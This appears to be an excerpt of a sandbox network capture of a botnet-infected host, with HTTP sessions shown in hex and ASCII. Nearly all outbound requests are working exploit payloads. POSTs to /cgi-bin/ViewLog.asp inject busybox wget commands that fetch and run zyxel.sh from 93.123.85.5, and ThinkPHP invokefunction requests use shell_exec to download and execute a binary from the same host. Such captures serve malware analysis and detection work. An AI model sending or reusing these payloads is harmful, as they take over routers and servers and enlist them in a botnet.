                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:46.720777988 CET13204INHTTP/1.1 404 Not Found
                                                              Server: Apache-Coyote/1.1
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 767
                                                              Date: Mon, 13 Nov 2023 21:19:46 GMT
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 31 30 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/cgi-bin/ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/7.0.109</h3></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              659192.168.2.234825495.245.119.2138080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.390584946 CET13109OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.s
                                                              Nov 13, 2023 22:19:46.738862038 CET13215INHTTP/1.1 401 Unauthorized
                                                              WWW-Authenticate: Basic realm="Protected"
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright &copy; 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              66192.168.2.233842695.110.209.2188080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.055757046 CET2574OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              660192.168.2.236024294.120.228.518080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.396095037 CET13110OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              661192.168.2.233324431.200.34.608080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.403676033 CET13111OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              66231.47.126.1348080192.168.2.2342236
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.417572975 CET13112INHTTP/1.0 400 Bad Request
                                                              Server: httpd/2.0
                                                              Date: Mon, 13 Nov 2023 21:19:45 GMT
                                                              Content-Type: text/html
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              663192.168.2.234782695.100.200.16280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.438257933 CET13113OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:46.732137918 CET13205INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:46 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:46 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 65 63 38 36 34 35 66 26 23 34 36 3b 31 36 39 39 39 31 30 33 38 36 26 23 34 36 3b 35 34 31 32 37 32 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9ec8645f&#46;1699910386&#46;5412721</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              664192.168.2.233956295.140.230.18880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.452702045 CET13113OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:46.760981083 CET13217INHTTP/1.1 400 Bad Request
                                                              Server: EdgePrism/5.1.5.0
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 21:19:46 GMT
                                                              Content-Type: text/plain
                                                              Expires: Mon, 13 Nov 2023 21:19:46 GMT
                                                              X-LLID: 8bad5a060a4ec6990c7be8f50f850d2f
                                                              Content-Length: 0
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              665192.168.2.233669295.129.97.6580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.463210106 CET13114OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:46.784270048 CET13218INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Mon, 13 Nov 2023 21:19:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 182
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              666192.168.2.235342295.76.133.17280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.503683090 CET13116OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:48.295326948 CET13369OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:50.598989964 CET13636OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:54.950515985 CET14257OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:03.397367001 CET15300OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:21.570959091 CET17552OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:56.382437944 CET20688OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              667192.168.2.233397095.163.52.12580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.511245012 CET13117OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:46.866765022 CET13229INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              668192.168.2.234214894.152.214.2068080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:47.355376005 CET13241OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:47.669362068 CET13255INHTTP/1.1 400 Bad Request
                                                              Server: squid/5.7
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 21:19:47 GMT
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Length: 3570
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Vary: Accept-Language
                                                              Content-Language: en
                                                              X-Cache: MISS from 5E98D6CE.static.tld.pl
                                                              X-Cache-Lookup: NONE from 5E98D6CE.static.tld.pl:8080
                                                              Via: 1.1 5E98D6CE.static.tld.pl (squid/5.7)
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: ve


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              669192.168.2.235094894.110.188.278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:47.356081963 CET13241OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


